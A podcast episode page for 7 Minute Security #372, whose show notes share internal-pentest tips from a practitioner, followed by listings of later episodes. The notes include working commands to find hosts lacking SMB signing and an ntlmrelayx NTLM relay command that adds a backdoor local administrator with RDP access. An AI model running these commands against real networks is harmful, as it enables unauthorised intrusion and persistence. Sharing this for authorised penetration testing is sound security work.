7MS #372: Tales of Internal Pentest Pwnage - Part 5
7 Minute Security15 Juli 2019

7MS #372: Tales of Internal Pentest Pwnage - Part 5

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute

Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode:

  • Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:
opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt

Source: Pwning internal networks automagically

  • Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget:
net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add

So the full command would be:

ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add'

Check today's show notes at https://7ms.us for more information!

Avsnitt(720)

7MS #424: Cyber News - Everything is Pwned Edition

7MS #424: Cyber News - Everything is Pwned Edition

Hello! We're back with our pal Joe "The Machine" Skeen (a.k.a. Gh0sthax) who has prepared some awesome and actionable news stories for us to digest. Today's stories include: Hackers are trying to st...

22 Juli 202033min

7MS #423: Tales of Internal Pentest Pwnage - Part 18

7MS #423: Tales of Internal Pentest Pwnage - Part 18

This is an especially fun tale of pentest pwnage because it involves D.D.A.D. (Double Domain Admin Dance) and varying T.T.D.A. (Time to Domain Admin). The key takeaways I want to share from these test...

15 Juli 202059min

7MS #422: Eating the Security Dog Food - Part 2

7MS #422: Eating the Security Dog Food - Part 2

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit [safepass.me](https://safepass.me/?7ms422 for more details, and te...

10 Juli 202042min

7MS #421: Cyber News - Verizon DBIR Edition

7MS #421: Cyber News - Verizon DBIR Edition

Today my pal Gh0sthax and I pick apart the Verizon Data Breach Investigations Report and help you turn it into actionable items so you can better defend your network! I'm especially excited because to...

1 Juli 202036min

7MS #420: Tales of Internal Pentest Pwnage - Part 17

7MS #420: Tales of Internal Pentest Pwnage - Part 17

Today's episode is a fun tale of pentest pwnage! Interestingly, to me this pentest had a ton of time-sponging issues on the front end, but the TTDA (Time to Domain Admin) was maybe my fastest ever. I ...

26 Juni 202044min

7MS #419: Eating the Security Dog Food

7MS #419: Eating the Security Dog Food

Today we're talking about eating the security dog food! What do I mean by that? Well, a lot of security companies I worked for in the past preached to clients about the importance of having a good sec...

17 Juni 202040min

7MS #418: Securing Your Mental Health

7MS #418: Securing Your Mental Health

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent...

11 Juni 202044min

7MS #417: Vulnerability Scanning Tips and Tricks

7MS #417: Vulnerability Scanning Tips and Tricks

Today's episode is all about getting the most value out of your vulnerability scans, including: Why, IMHO you should only do credentialed scans Policy tweaks that will keep servers from tipping ov...

4 Juni 202043min

Populärt inom Politik & nyheter

aftonbladet-krim
rss-krimstad
p3-krim
spar
svenska-fall
aftonbladet-daily
politiken
flashback-forever
rss-expressen-dok
rss-sanning-konsekvens
rss-krimreportrarna
kungligt
ett-rent-noje
rss-vad-fan-hande
motiv
blenda-2
grans
rss-frandfors-horna
rss-flodet
krimmagasinet